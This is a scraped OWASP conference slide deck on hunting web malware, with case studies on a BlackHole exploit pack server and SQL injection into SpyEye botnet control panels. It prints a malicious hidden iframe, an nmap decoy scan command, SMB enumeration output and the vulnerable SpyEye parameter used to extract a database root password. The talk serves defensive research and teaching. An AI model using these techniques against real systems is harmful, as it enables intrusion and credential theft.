SlideShare une entreprise Scribd logo
1  sur  41
The Good Hacker – Dismantling
                  Web Malware



                         Aditya K Sood and Richard J Enbody
                         SecNiche Security Labs
                         Michigan State University
OWASP                    adi_ks [at] secniche.org | enbody [at] cse.msu.edu
AppSec USA 2011
Minneapolis, Minnesota
                         Copyright © The OWASP Foundation
September 22-23,         Permission is granted to copy, distribute and/or modify this document
2010                     under the terms of the OWASP License.




                         The OWASP Foundation
                         http://www.owasp.org
Disclaimer

 All contents of this presentation represent my own beliefs and views and do not,
  unless explicitly stated otherwise, represent the beliefs of my current, or any of my
  previous in that effect, employers.



Dependency
  Penetration Testing
  Web Malware Hunting


  Thanks
  Cigital Inc. for supporting our talk.




                                                                          OWASP           2
About Us
 Aditya K Sood
    Founder , SecNiche Security
         Independent Security Consultant, Researcher and Practitioner
         Worked previously for Armorize, Coseinc and KPMG
         Active Speaker at Security conferences
         Written Content – ISSA/ISACA/CrossTalk/HITB/Hakin9/Elsevier NES|CFS
         LinkedIn : http://www.linkedin.com/in/adityaks
         Website: http://www.secniche.org | Blog:
          http://secniche.blogspot.com | @AdityaKSood
     PhD Candidate at Michigan State University
 Dr. Richard J Enbody
    Associate Professor, CSE, Michigan State University
          Since 1987, teaching computer architecture/ computer security /
           mathematics
          Website: http://www.cse.msu.edu/~enbody
    Co-Author CS1 Python book, The Practice of Computing using Python.
    Patents Pending – Hardware Buffer Overflow Protection

                                                                       OWASP    3
This talk is all about ……………

      Malware Hunter (Good Hacker)
                    =
           Penetration Testing
                    +
              Web Security
                    +
            Malware Analysis
                               OWASP   4
Agenda

  Malware Paradigm – The State of Online World
  Reality of Browsers
  Browser Malware Taxonomy
  Website Infection – Strategies used by Attackers
  Website Traffic Analysis and Dumps
      Methodology
  Hunting Web Malware
      Case Study 1  BlackHole Exploit Pack
      Case Study 2  SpyEye Command and Control Take Down
  Conclusion


                                                  OWASP      5
Anatomy of Malware – Unbearable Truth




                                   OWASP   6
Malware – Impact on Real World




                                 OWASP   7
Underground Malware – Market Business




© GDATA




                                  OWASP   8
Malware Flow Model



                                  Malware Writers Role




  Flow of Malware Websites


© Reihe Informatik. TR-2007-011




                                                         OWASP   9
Reality of Browsers – Truth Behind the Bars
      Old Browsers Die Hard




http://www.ie6countdown.com/
                                     OWASP    10
Browser Malware Taxonomy
   Class A – Browser Malware




                                OWASP   11
Browser Malware Taxonomy
   Class B – Browser Malware




                                OWASP   12
Browser Malware Taxonomy
   Class C – Browser Malware




                                OWASP   13
Website Infections – Malware Kicking
   Finest Malware Infection Attacks
      Iframe Injections ( Hidden + Unhidden)
        – <iframe src =“” width=0 height=0 />
            » Obfuscated hyperlinks to malicious files
            » Malvertisements ( on fire nowadays)
      Rogue .JS / .SWF
        – <script src =“”/> | <object /> | <embed />
            » Obfuscated scripts are the best choice
      Compromising Servers
        –   Exploiting web virtual hosting
        –   Open Relay Server : sending spams with malicious links
        –   FTP Servers – Hacking credentials to update website files
        –   Database Servers – Persistent SQL injections / XSS Bugs
              » Mass SQL injections on rise
      Server Side Redirects (Persistent)
        – Injecting malicious redirects in the web server configuration files 14
                                                              OWASP
Drive By Downloads – The Evil Reaction
  Complete Details
        – Victim browser is forced to visit infected website
        – Iframe redirects browser to the EXPLOIT POINT (Exploit Hub)
        – Exploit is served by fingerprinting browser environment
        – Browser is exploited successfully
        – Exploit point silently asks for the malware from the malicious
          domain
             » It can be self driven
        – Malware is downloaded into system and automatically installed




                                                          OWASP        15
Drive By Cache – Holy Crap !
   What is it ?
        – Brother of Drive by Download Attacks. Is it ?
        – More efficient way to bypass anti virus protections .
   Drive by Cache / Drive by Downloads
        – Very less variations have been noticed ( Drive By Cache)
        – However, the infections are still in the wild and some of the
          traces have been noticed
        – Lot more to research over this attack but it has been initialized
          already
        – Reference: http://blog.armorize.com/2011/04/newest-adobe-
          flash-0-day-used-in-new.html




                                                               OWASP          16
Website Malware Scanning – Cloud in Action
    URL Dissection
        Google Safe Browsing
            – User-Agent (Browser Specific)/ DNS Blacklisting
            – Past history of malware specific domains


                               Online Web
                                Malware
                                Scanners



 Blacklisted URL’s                                      Suspicious URL’s




                 Malware URL’s              Clean URL’s
                                                                OWASP      17
Web Malware Hunting - Core




                             OWASP   18
Hunting Web Malware
   Required Techniques and Tactics
      Detailed understanding of different malware taxonomies
         – The way malware enters into system from web
         – Example: Malvertisements, Drive by Download attacks.
      Categorization and Classification of malware is important
         – Explicitly defines the malware working
         – Defines the exact target to hunt
      Understanding of Browser exploitation in detail
         – Malware infecting various component of browsers
      Web attacks and defenses
         – Latest attack developments in the field of web
      Penetration Testing (System Level) is the key to success
         – Hard to imagine to hunt malware without reverse
           hacking

                                                             OWASP   19
Pattern Detection – Google in Action
    Detecting Live Targets
       Search for specific patterns using Google
          – Iframe patterns / strings/ malware domain names etc




                                                            OWASP   20
Pattern Detection – Malware Domains Listing
    Public Repositories




                                    OWASP     21
Dissecting Traffic Dumps and Analysis
   Malware Traffic - PCAP Files
      Raw dumps of captured packets
      Provides information about traffic
           – Ingress/Egress traffic
      Information about the DNS Servers, IP Addresses
           – Malicious executable served by the malicious domain
      Protocol abuse


  Extracting Malware (Executables/ Binaries)
        WireShark – follow TCP/UDP stream
        Dump data and edit with hex editor
        Verifying the PE headers (specially MZ)
        Rebuild the files for static and behavioral analysis

                                                                OWASP   22
Dissecting Traffic Dumps and Analysis
   What Else than WireShark ?
      Network Miner




                                    OWASP   23
Dissecting Traffic Dumps and Analysis
   What Else than WireShark ?
      Xplico




      Scapy (Network – Swiss Army Knife)




                                            OWASP   24
Dissecting Traffic Dumps and Analysis
   Walking through the Process (Generic)
      Step 1 - Applying filters in WireShark ( to remove unwanted
       traffic)
             » http://media.packetlife.net/media/library/13/Wireshark_Dis
               play_Filters.pdf
      Step 2 - Create the requisite PCAP files
             » Use rdpcap() / sniff(offline=“”) (Scapy) to walkthrough
               PCAP files
             » Pdfdump/Psdump to make graphical output
      Step 3 - Perform data operations (Scapy)
             » Example: Writing first 5 bytes file_handle(pkt.load[5:])
             » Other required data operations
      Step 4 – Automated mining of PCAP files
             » Use Network Miner and Xplico


                                                             OWASP          25
Extracting Executables from HTTP/HTTPS Traffic
    TCP Session Stream Analysis
         Reconstructing the TCP session stream
         Scrutinize the content present in the TCP session
         Malware binaries are present as raw/encoded data
         Verifying the HTTP/HTTPS end points to collect all data

    What to Look For ?
       Find the starting point of TCP communication
       Follow the TCP session stream
            – WireShark does that for you.
       Walkthrough the raw data.
            – Search for two byte header MZ ($4D5A in hex) which begins
              at a certain offset to trace the PE
            – Dump the binary as raw output. Avoid encodings.

                                                                OWASP     26
Extracting Executables from HTTP/HTTPS Traffic




                                    OWASP   27
Case Studies – Malware Hunting




                            OWASP   28
Case Study – BlackHole Exploit Pack - Hunt
   BlackHole Exploit Pack
        One of the frivolous used exploit pack
        Used extensively for spreading malware
        Exploits browser and plugin vulnerabilities
        Collaboratively used with botnets to spread malware


  BlackHole – Spreading Infection
        A malicious link is served through spams
        Social engineering to force victims to visit malicious links
        Manipulating social networking capabilities
        Spreading scams and tricking victims to work it out

           Note: This case study is an outcome of real time
           hunting of web malware in a university network.

                                                              OWASP     29
Case Study – BlackHole Exploit Pack - Hunt
   Understanding the Environment
      A malicious website was hosted by the attacker
      Utilized a zombie machine to host a web server
      Fake emails were pushed in legitimate networks
         – Malicious link was injected into it
         – Malicious website hosted a web page with link to malicious
           domain
      Malicious iframe was detected and deobfuscated as
          <iframe src="http://malware/phx/index.php"
        width="1" height="1" frameborder="0“></iframe>


      “index.php” fingerprinted the browser (version / plugins)
      Exploit was served based on the environment


                                                             OWASP      30
Case Study – BlackHole Exploit Pack - Hunt
   Exploit Serving
      “index.php” found the installed JAVA to be vulnerable
      It exploited JAVA SMB vulnerability and started throwing
       the requisite exploit for it
      ALERT !
          – JAVA SMB exploit requires an SMB server to be installed on the
            domain or subdomain to include the exploit through UNC path
      Mapping the IP and NMAP scan was initiated
          – Decoy Scan and IP Spoofing scans are always the best

     nmap -P0 -A -T4 -sS blackhole_host -D 112.123.124.111 -p 445
       Starting Nmap 5.51 ( http://nmap.org ) at 2011-04-06 13:07 Eastern Daylight Time
       PORT STATE SERVICE VERSION
       445/tcp open netbios-ssn Samba smbd 3.X
       Running: Linux 2.6.X
       OS details: Linux 2.6.17 - 2.6.35
       Network Distance: 1 hop
       Host script results:
       |_, NetBIOS user: , NetBIOS MAC:
       |_smbv2-enabled: Server doesn't support SMBv2 protocol
                                                                             OWASP        31
Case Study – BlackHole Exploit Pack - Hunt
   Exploit Serving
      “new.avi” file was served as an exploit
      Gotcha !
           – SMB server was configured and serving exploit
               » Hard to think whether the usermode security is applied
               » SMB usermode = {username, password} required
      So What – Shared mode is configured
           – Default IPC$ share was available
     E:audit>enum -P blackhole_host
        server: blackhole_host
        setting up session... success.
        password policy:
        min length: 5 chars
        min age: none
        max age: none
        lockout threshold: none
        lockout duration: 30 mins
        lockout reset: 30 mins
        cleaning up... success.

                                                              OWASP       32
Case Study – BlackHole Exploit Pack - Hunt
   Verifying the Facts
      The server was not browseable
      Fuzzing the UNC path as follows
        •    blackhole_hosthomenew.avi
        •   blackhole_hostusrnew.avi
        •   blackhole_hosthomesmbnew.avi [ Gotcha]
        •   blackhole_hostusrsmbnew.avi


      SMB server must be configured with following metrics
      [global]
      security = share
      [smb]
      comment = smb
      path = /home/smb
      public = yes
      browseable = no
      writeable = no
      guest ok = yes
                                                       OWASP   33
Case Study – BlackHole Exploit Pack - Hunt
   At Last




      We were also able to crack the SMB login credentials to take
       control over the server.

                                                        OWASP         34
Case Study – Botnet C&C SQL Injection
   SpyEye Botnet C&C Target
     Exploiting the SQL injection to take control of
     Fetch the target using abuse.ch service




                                                        OWASP   35
Case Study – Botnet C&C SQL Injection
   SpyEye Botnet C&C Target
     Vulnerability lies in “ frmcp0/frm_findrep_sub2.php?id="
     Getting the version number




                                                         OWASP   36
Case Study – Botnet C&C SQL Injection
   SpyEye Botnet C&C Target
     Vulnerability lies in “ frmcp0/frm_findrep_sub2.php?id="
     Getting the database




                                                         OWASP   37
Case Study – Botnet C&C SQL Injection
   SpyEye Botnet C&C Target
     Vulnerability lies in “ frmcp0/frm_findrep_sub2.php?id="
     Getting the MySQL root password




                                                         OWASP   38
Conclusion
   For Rigorous Web Malware Hunting
      Robust penetration testing skills required
      Understanding of
         – Malware infection framework
         – Working of exploit serving mechanisms
         – Detailed web security knowledge with all types of attacks
      At last, think like an attacker




                                                              OWASP    39
References
   Notorious Datacenter Servers - Support Systems Pwning Through Outer
    Sphere : http://magazine.hitb.org/issues/HITB-Ezine-Issue-004.pdf
   Exploiting Web Virtual Hosting – Malware Infections :
    http://magazine.hitb.org/issues/HITB-Ezine-Issue-005.pdf
   Browser Malware Taxonomy :
    http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106-
    browser-malware-taxonomy
   SpyEye Malware Infection Framework :
    http://www.virusbtn.com/virusbulletin/archive/2011/07/vb201107-
    SpyEye
   SpyEye Bot – Aggressive Exploitation Tactics :
    http://www.virusbtn.com/virusbulletin/archive/2011/08/vb201108-spyeye
   Malware at Stake : http://secniche.blogspot.com




                                                            OWASP       40
Thanks

    OWASP (http://www.owasp.org )
    SecNiche Security Labs (http://www.secniche.org )
    Cigital Inc
    Twitter - @AdityaKSood
    Feel free to send any queries.




                                                         OWASP   41

Contenu connexe

Tendances

(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk   apt, cyber espionage threat(130119) #fitalk   apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threatINSIGHT FORENSIC
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 -  N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 -  N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...grecsl
 
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판Minseok(Jacky) Cha
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0Rakesh Kachhadiya
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVThomas Roccia
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Hardening Enterprise Apache
Hardening Enterprise ApacheHardening Enterprise Apache
Hardening Enterprise Apacheguestd9aa5
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automationOWASP
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014grecsl
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...Fedir RYKHTIK
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
State of Web App Security 2012
State of Web App Security 2012State of Web App Security 2012
State of Web App Security 2012Robert Rowley
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 

Tendances (17)

(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk   apt, cyber espionage threat(130119) #fitalk   apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 -  N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 -  N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
 
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0
 
CoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLVCoinMiners are Evasive - BsidesTLV
CoinMiners are Evasive - BsidesTLV
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Hardening Enterprise Apache
Hardening Enterprise ApacheHardening Enterprise Apache
Hardening Enterprise Apache
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery...
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
State of Web App Security 2012
State of Web App Security 2012State of Web App Security 2012
State of Web App Security 2012
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017
 

En vedette

Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with VagrantQuick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with VagrantJoe Ferguson
 
Reverse Engineering Malware
Reverse Engineering MalwareReverse Engineering Malware
Reverse Engineering Malwaresecurityxploded
 
Proofing against malware
Proofing against malwareProofing against malware
Proofing against malwareSensePost
 
Dissecting State-of-the-Art Android Malware Using Static and Dynamic Analysis
Dissecting State-of-the-Art Android Malware Using Static and Dynamic AnalysisDissecting State-of-the-Art Android Malware Using Static and Dynamic Analysis
Dissecting State-of-the-Art Android Malware Using Static and Dynamic AnalysisCHOOSE
 
The Internet is on Fire - Mikko Hypponen at TEDxBrussels 2014
The Internet is on Fire - Mikko Hypponen at TEDxBrussels 2014The Internet is on Fire - Mikko Hypponen at TEDxBrussels 2014
The Internet is on Fire - Mikko Hypponen at TEDxBrussels 2014Mikko Hypponen
 
Governments As Malware Authors - Mikko Hypponen at Black Hat 2014
Governments As Malware Authors - Mikko Hypponen at Black Hat 2014Governments As Malware Authors - Mikko Hypponen at Black Hat 2014
Governments As Malware Authors - Mikko Hypponen at Black Hat 2014Mikko Hypponen
 
Weaponised Malware & APT Attacks: Protect Against Next-Generation Threats
Weaponised Malware & APT Attacks: Protect Against Next-Generation ThreatsWeaponised Malware & APT Attacks: Protect Against Next-Generation Threats
Weaponised Malware & APT Attacks: Protect Against Next-Generation ThreatsLumension
 
Finfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtFinfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtSecurity Bootcamp
 
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesCNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesSam Bowne
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware AnalysisAndrew McNicol
 

En vedette (13)

Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with VagrantQuick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with Vagrant
 
Malware-Troyanos-javier
Malware-Troyanos-javierMalware-Troyanos-javier
Malware-Troyanos-javier
 
Reverse Engineering Malware
Reverse Engineering MalwareReverse Engineering Malware
Reverse Engineering Malware
 
Proofing against malware
Proofing against malwareProofing against malware
Proofing against malware
 
Dissecting State-of-the-Art Android Malware Using Static and Dynamic Analysis
Dissecting State-of-the-Art Android Malware Using Static and Dynamic AnalysisDissecting State-of-the-Art Android Malware Using Static and Dynamic Analysis
Dissecting State-of-the-Art Android Malware Using Static and Dynamic Analysis
 
The Internet is on Fire - Mikko Hypponen at TEDxBrussels 2014
The Internet is on Fire - Mikko Hypponen at TEDxBrussels 2014The Internet is on Fire - Mikko Hypponen at TEDxBrussels 2014
The Internet is on Fire - Mikko Hypponen at TEDxBrussels 2014
 
Governments As Malware Authors - Mikko Hypponen at Black Hat 2014
Governments As Malware Authors - Mikko Hypponen at Black Hat 2014Governments As Malware Authors - Mikko Hypponen at Black Hat 2014
Governments As Malware Authors - Mikko Hypponen at Black Hat 2014
 
Weaponised Malware & APT Attacks: Protect Against Next-Generation Threats
Weaponised Malware & APT Attacks: Protect Against Next-Generation ThreatsWeaponised Malware & APT Attacks: Protect Against Next-Generation Threats
Weaponised Malware & APT Attacks: Protect Against Next-Generation Threats
 
Finfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtFinfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn Việt
 
ATP
ATPATP
ATP
 
Cybercrime 1
Cybercrime 1Cybercrime 1
Cybercrime 1
 
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesCNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 

Similaire à OWASP AppSec USA 2011 - Dismantling Web Malware

OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionWayne Huang
 
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
[OWASP-Bulgaria] G. Geshev - Chapter Introductory LectureG. Geshev
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLooking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLudovic Petit
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
Analysis Of Adverarial Code - The Role of Malware Kits
Analysis Of Adverarial Code - The Role of Malware KitsAnalysis Of Adverarial Code - The Role of Malware Kits
Analysis Of Adverarial Code - The Role of Malware KitsRahul Mohandas
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Rahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_CodeRahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_Codeguest66dc5f
 
Threats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisThreats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisIan G
 
New Insights into Clickjacking
New Insights into ClickjackingNew Insights into Clickjacking
New Insights into ClickjackingMarco Balduzzi
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
 
OWASP Khartoum Top 10 A4 - 7th meeting
OWASP Khartoum   Top 10 A4 - 7th meetingOWASP Khartoum   Top 10 A4 - 7th meeting
OWASP Khartoum Top 10 A4 - 7th meetingOWASP Khartoum
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionWayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Stephan Chenette
 

Similaire à OWASP AppSec USA 2011 - Dismantling Web Malware (20)

OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Fireshark - Brucon 2010
Fireshark - Brucon 2010Fireshark - Brucon 2010
Fireshark - Brucon 2010
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
OWASP Bulgaria
OWASP BulgariaOWASP Bulgaria
OWASP Bulgaria
 
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security ExcellenceLooking Forward… and Beyond - Distinctiveness Through Security Excellence
Looking Forward… and Beyond - Distinctiveness Through Security Excellence
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
Analysis Of Adverarial Code - The Role of Malware Kits
Analysis Of Adverarial Code - The Role of Malware KitsAnalysis Of Adverarial Code - The Role of Malware Kits
Analysis Of Adverarial Code - The Role of Malware Kits
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Rahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_CodeRahul-Analysis_of_Adversarial_Code
Rahul-Analysis_of_Adversarial_Code
 
Modern Malware and Threats
Modern Malware and ThreatsModern Malware and Threats
Modern Malware and Threats
 
Threats, Threat Modeling and Analysis
Threats, Threat Modeling and AnalysisThreats, Threat Modeling and Analysis
Threats, Threat Modeling and Analysis
 
New Insights into Clickjacking
New Insights into ClickjackingNew Insights into Clickjacking
New Insights into Clickjacking
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
OWASP Khartoum Top 10 A4 - 7th meeting
OWASP Khartoum   Top 10 A4 - 7th meetingOWASP Khartoum   Top 10 A4 - 7th meeting
OWASP Khartoum Top 10 A4 - 7th meeting
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012Watchtowers of the Internet - Source Boston 2012
Watchtowers of the Internet - Source Boston 2012
 

Plus de Aditya K Sood

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareAditya K Sood
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
 
Detecting Ransomware/Bot Infections in Elasticsearch
